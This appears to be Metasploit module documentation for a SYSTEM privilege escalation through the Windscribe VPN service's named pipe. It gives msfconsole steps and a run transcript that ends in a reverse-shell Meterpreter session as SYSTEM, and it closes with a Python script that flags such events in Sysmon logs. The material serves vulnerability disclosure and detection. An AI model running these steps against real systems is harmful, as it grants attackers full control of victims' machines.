## Description

  The Windscribe VPN client application for Windows makes use of a
  Windows service `WindscribeService.exe` which exposes a named pipe
  `\\.\pipe\WindscribeService` allowing execution of programs with
  elevated privileges.

  Windscribe versions prior to 1.82 do not validate user-supplied
  program names, allowing execution of arbitrary commands as SYSTEM.


## Vulnerable Application

  This module has been tested successfully on [Windscribe](https://windscribe.com/)
  versions 1.80 and 1.81 on Windows 7 SP1 (x64).

  Download:

  * https://assets.windscribe.com/desktop/win/Windscribe_1.80.exe
  * https://assets.windscribe.com/desktop/win/Windscribe_1.81.exe


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/windows/local/windscribe_windscribeservice_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *SYSTEM* session


## Options

  **SESSION**

  The session to run this module on. Available sessions can be listed with `sessions`.

  **WritableDir**

  A writable directory file system path. (default: `%TEMP%`)


## Scenarios

### Windows 7 SP1 (x64)

  ```
  msf5 > use exploit/windows/local/windscribe_windscribeservice_priv_esc 
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set session 1
  session => 1
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > check
  [*] The service is running, but could not be validated.
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(windows/local/windscribe_windscribeservice_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] Writing payload (283 bytes) to C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe ...
  [*] Sending C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe to \\.\pipe\WindscribeService ...
  [+] Opened \\.\pipe\WindscribeService! Proceeding ...
  [*] Sending stage (180291 bytes) to 172.16.191.242
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49365) at 2020-01-31 19:14:31 -0500
  [-] Failed to delete C:\Users\test\AppData\Local\Temp\1OOIoYHTpb.exe: stdapi_fs_delete_file: Operation failed: Access is denied.

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : TEST
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >
  ```
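
A detection-side view of the run above, as an added example that is not part of the module or its documentation: it flags Sysmon-style process-creation events (Event ID 1) in which `WindscribeService.exe` is the parent of a SYSTEM process whose image sits in a user-writable directory, as the payload path in the transcript does. The event dictionaries, the `INSTALL_DIR` placeholder, `helper.exe` and the list of user-writable path fragments are constructed assumptions.

```python
import ntpath

SERVICE_IMAGE = "windscribeservice.exe"  # service binary named in the Description
SYSTEM_USER = "nt authority\\system"
# Assumption: path fragments treated as user-writable; tune for your estate.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")


def is_suspicious(event):
    """True when the Windscribe service started a SYSTEM process whose
    image lives in a user-writable directory."""
    if event.get("EventID") != 1:  # Sysmon process-creation event
        return False
    if ntpath.basename(event.get("ParentImage", "")).lower() != SERVICE_IMAGE:
        return False
    if event.get("User", "").lower() != SYSTEM_USER:
        return False
    # Normalise separators and ".." segments before matching on the directory.
    image = ntpath.normpath(event.get("Image", "")).lower()
    directory = ntpath.dirname(image) + "\\"
    return any(fragment in directory for fragment in USER_WRITABLE)


def triage(events):
    """Return the child image paths that deserve an analyst's attention."""
    return [e["Image"] for e in events if is_suspicious(e)]


# Constructed events. INSTALL_DIR and helper.exe are placeholders; the Temp
# path is the one shown in the transcript above.
SVC = "C:\\INSTALL_DIR\\WindscribeService.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Users\\test\\AppData\\Local\\Temp\\1OOIoYHTpb.exe"},
    {"EventID": 1, "ParentImage": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\INSTALL_DIR\\helper.exe"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "User": "TEST\\test",
     "Image": "C:\\Users\\test\\AppData\\Local\\Temp\\setup.exe"},
    {"EventID": 1, "ParentImage": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:/INSTALL_DIR/../Users/Public/tool.exe"},
]

if __name__ == "__main__":
    for path in triage(SAMPLE_EVENTS):
        print("ALERT: WindscribeService.exe spawned", path)
```

On the sample data only the first and last events are reported; the second is a child launched from the placeholder install directory and the third has a different parent and user.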

